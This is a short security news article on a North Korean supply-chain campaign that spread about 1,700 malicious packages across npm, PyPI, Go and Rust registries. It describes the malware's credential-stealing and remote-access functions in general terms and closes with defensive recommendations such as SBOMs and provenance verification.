N. Korean Hackers Spread 1,700 Malicious Packages Across Npm, PyPI, Go, Rust

Supply‑chain attacks have become a cornerstone of cyber‑espionage, and the latest North Korean operation illustrates how state‑backed actors are scaling this model. Since early 2025, UNC1069’s Contagious Interview campaign has injected over 1,700 malicious libraries into five of the most popular package registries. By leveraging the trust developers place in open‑source components, the group creates a low‑profile entry point that bypasses traditional perimeter defenses, expanding the attack surface far beyond a single language or platform.

Technical analysis reveals that the compromised packages act as silent loaders, pulling second‑stage payloads that combine infostealer functions with full remote‑access trojan capabilities. The malware harvests credentials from browsers, password managers and cryptocurrency wallets, while also providing post‑compromise tools such as keystroke logging, file exfiltration, encrypted archives and AnyDesk remote sessions. Crucially, the malicious code is woven into legitimate‑looking functions—e.g., a Logger::trace method—so it remains dormant during installation and evades static scanning tools, only activating when the targeted function is called.

For enterprises, the campaign underscores the urgency of adopting robust software‑bill‑of‑materials (SBOM) practices, continuous monitoring of dependency updates, and automated provenance verification. Security teams must also enforce strict access controls on package publishing accounts and employ runtime detection solutions that can spot anomalous behavior in trusted libraries. As North Korean groups continue to refine their supply‑chain tactics, organizations that treat open‑source components as a critical attack vector will be better positioned to mitigate the financial and reputational fallout of such incursions.